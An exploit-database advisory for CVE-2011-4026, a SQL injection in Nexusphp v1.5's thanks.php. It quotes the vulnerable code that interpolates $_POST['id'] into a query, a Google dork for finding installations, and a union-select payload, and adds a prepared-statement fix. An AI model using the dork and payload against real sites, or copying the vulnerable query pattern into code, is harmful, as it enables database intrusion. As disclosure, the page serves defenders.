Nexusphp.v1.5 SQL injection Vulnerability - exploit.company
Vendor: Nexusphp
By: flyh4t
CVSS: 7.5 (HIGH)
CWE: 89 (SQL injection)
Product Name: Nexusphp
Affected Version From: nexusphp.v1.5
Affected Version To: nexusphp.v1.5
Patch Exists: NO
CVE: CVE-2011-4026
CPE: a:nexusphp:nexusphp:1.5
Metasploit:
Other Scripts:
Platforms Tested: Linux (tested on Linux with Apache)
Date: 2011

Nexusphp.v1.5 SQL injection Vulnerability

There is a SQL injection vulnerability in the thanks.php file of Nexusphp v1.5. The $_POST['id'] parameter is placed into a SQL query without being checked, which allows an attacker to perform an SQL injection attack. An attacker can exploit this vulnerability by using the payload _POST[id] : -1 union select version()>4/*

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before using it in SQL queries. This can be done by using prepared statements or parameterized queries.
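The following is an added example of that mitigation, not code from Nexusphp or from the advisory's author. It assumes a mysqli connection (the original thanks.php uses the older mysql_* functions) and the torrents table with id and owner columns named in the vulnerable snippet; the function names are hypothetical. The torrent id is first required to be a positive integer, then bound as a parameter, so the value the page's payload supplies never reaches the query as SQL text.

```php
<?php
// Added example: hardened replacement for the unchecked query in thanks.php.
// Assumes $db is an open mysqli connection and the torrents(id, owner) table
// from the advisory. Function names are hypothetical.

// Returns the id as an int, or null when the request value is not a positive
// integer. The page's payload "-1 union select version()>4/*" fails here
// before any SQL is built, as does an empty or missing value.
function validate_torrent_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Looks up the torrent owner with a prepared statement. The id is sent as a
// bound integer parameter, so the database never parses it as part of the
// statement text.
function torrent_owner(mysqli $db, ?int $torrentId): ?int
{
    if ($torrentId === null) {
        return null; // caller should reject the request, e.g. with stderr()
    }
    $stmt = $db->prepare('SELECT owner FROM torrents WHERE id = ?');
    $stmt->bind_param('i', $torrentId);
    $stmt->execute();
    $stmt->bind_result($owner);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? (int) $owner : null;
}

// Usage in the request handler, replacing the direct interpolation:
//   $torrentid = validate_torrent_id($_POST['id'] ?? null);
//   $owner = torrent_owner($db, $torrentid);
```

Note that the original code only rejects the $_GET['id'] form of the request and then trusts $_POST['id']; the validation above is applied to whichever value is actually used in the query, which is the check the vulnerable code lacks.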
Source

Exploit-DB raw data:

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability
# Google Dork: intitle:nexusphp
# Date: 2011-10-08
# Author: flyh4t
# Software Link: http://sourceforge.net/projects/nexusphp/
# Version: nexusphp.v1.5
# Tested on: linux+apache
# CVE : CVE-2011-4026


Nexusphp is a BitTorrent private tracker script written in PHP.
The code is here: http://sourceforge.net/projects/nexusphp/
There is a SQL injection vulnerability in thanks.php.
 
-----------------------vul code-------------------
//thanks.php
// Only the GET form of the request is rejected; the POST value is trusted.
if ($_GET['id'])
    stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");
$userid = $CURUSER["id"];
$torrentid = $_POST["id"];   // taken verbatim from the request body
// $torrentid is interpolated into the SQL string with no validation or escaping
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");
$arr = mysql_fetch_array($tsql);
-----------------------vul code end-------------------
 
$_POST["id"] is not checked, leading to a SQL injection vulnerability.

-----------------------exploit-------------------

_POST[id] : -1 union select version()>4/*

-----------------------exploit end -------------------